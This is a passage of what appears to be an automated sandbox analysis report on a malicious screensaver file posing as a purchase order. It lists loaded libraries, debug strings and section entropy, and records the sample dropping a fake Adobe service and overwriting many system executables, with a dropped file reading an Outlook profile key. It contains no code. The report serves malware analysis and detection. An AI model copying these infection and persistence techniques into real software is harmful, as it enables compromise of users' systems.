                  Source: C:\Windows\System32\wbengine.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fvecerts.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: credssp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: apihost.exe.lnk.12.drLNK file: ..\..\..\..\..\ACCApi\apihost.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: PO#_1100015533.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO#_1100015533.scrStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: PO#_1100015533.scrStatic file information: File size 1538560 > 1048576
                  Source: PO#_1100015533.scrStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x176200
                  Source: PO#_1100015533.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: msiexec.pdb source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 0000000B.00000003.528121560.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdbx64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 0000000B.00000003.527912305.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vssvc.pdb source: armsvc.exe, 0000000B.00000003.456410377.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.464565627.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, VSSVC.exe.11.dr
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb\ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: sppsvc.pdb source: armsvc.exe, 0000000B.00000003.445848653.0000000002570000.00000004.00001000.00020000.00000000.sdmp, sppsvc.exe.11.dr
                  Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: aspnet_state.pdb source: armsvc.exe, 0000000B.00000003.382154090.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, aspnet_state.exe.11.dr
                  Source: Binary string: _.pdb source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.614225292.0000000003F13000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 0000000B.00000003.530679334.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: FXSSVC.pdb source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehSched.pdb source: armsvc.exe, 0000000B.00000003.416561300.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb@SH source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: x64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 0000000B.00000003.527378625.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 0000000B.00000003.528425595.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdb source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: VSTOInstaller.pdb source: armsvc.exe, 0000000B.00000003.577349873.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.577330836.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: dllhost.pdb source: armsvc.exe, 0000000B.00000003.406747169.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.411082101.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.406378900.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 0000000B.00000003.532521819.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 0000000B.00000003.490450790.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.498920191.0000000001C80000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 0000000B.00000003.513401630.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 0000000B.00000003.527765459.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: armsvc.exe, 0000000B.00000003.581129841.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 0000000B.00000003.528742519.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Binary string: PerfHost.pdb source: armsvc.exe, 0000000B.00000003.442858130.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441621041.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441414190.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 0000000B.00000003.528293885.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdbH source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb D source: OSE.EXE.11.dr
                  Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb? source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: i0C:\Windows\mscorlib.pdb source: hVVSnrrP.exe, 00000035.00000002.548197085.0000000000678000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 0000000B.00000003.527614057.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 0000000B.00000003.528636073.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 0000000B.00000003.523640565.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdb source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.403111110.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.405006368.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.395627106.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.394676525.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.402917632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 0000000B.00000003.528519701.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 0000000B.00000003.428010284.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehRecvr.pdb source: armsvc.exe, 0000000B.00000003.412276451.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Trading_AIBot.exe.8.drStatic PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
                  Source: armsvc.exe.8.drStatic PE information: section name: .didat
                  Source: elevation_service.exe.11.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.11.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.11.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.11.drStatic PE information: section name: .voltbl
                  Source: elevation_service.exe.11.drStatic PE information: section name: _RDATA
                  Source: PO#_1100015533.scrStatic PE information: section name: .text entropy: 7.87067678928939
                  Source: hVVSnrrP.exe.0.drStatic PE information: section name: .text entropy: 7.87067678928939
                  Source: SearchIndexer.exe.11.drStatic PE information: section name: .reloc entropy: 7.935204414694247
                  Source: ehrecvr.exe.11.drStatic PE information: section name: .reloc entropy: 7.940817120841736
                  Source: FXSSVC.exe.11.drStatic PE information: section name: .reloc entropy: 7.93155292375944
                  Source: elevation_service.exe.11.drStatic PE information: section name: .reloc entropy: 7.943546715640478
                  Source: sppsvc.exe.11.drStatic PE information: section name: .reloc entropy: 7.935823751154218
                  Source: VSSVC.exe.11.drStatic PE information: section name: .reloc entropy: 7.924765150393403
                  Source: wmpnetwk.exe.11.drStatic PE information: section name: .reloc entropy: 7.917500544087672
                  Source: wbengine.exe.11.drStatic PE information: section name: .reloc entropy: 7.926522643506996

                  Persistence and Installation Behavior

                  barindex
                  Drops executable to a common third party application directory
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehsched.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\dllhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\ieetwcollector.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exe
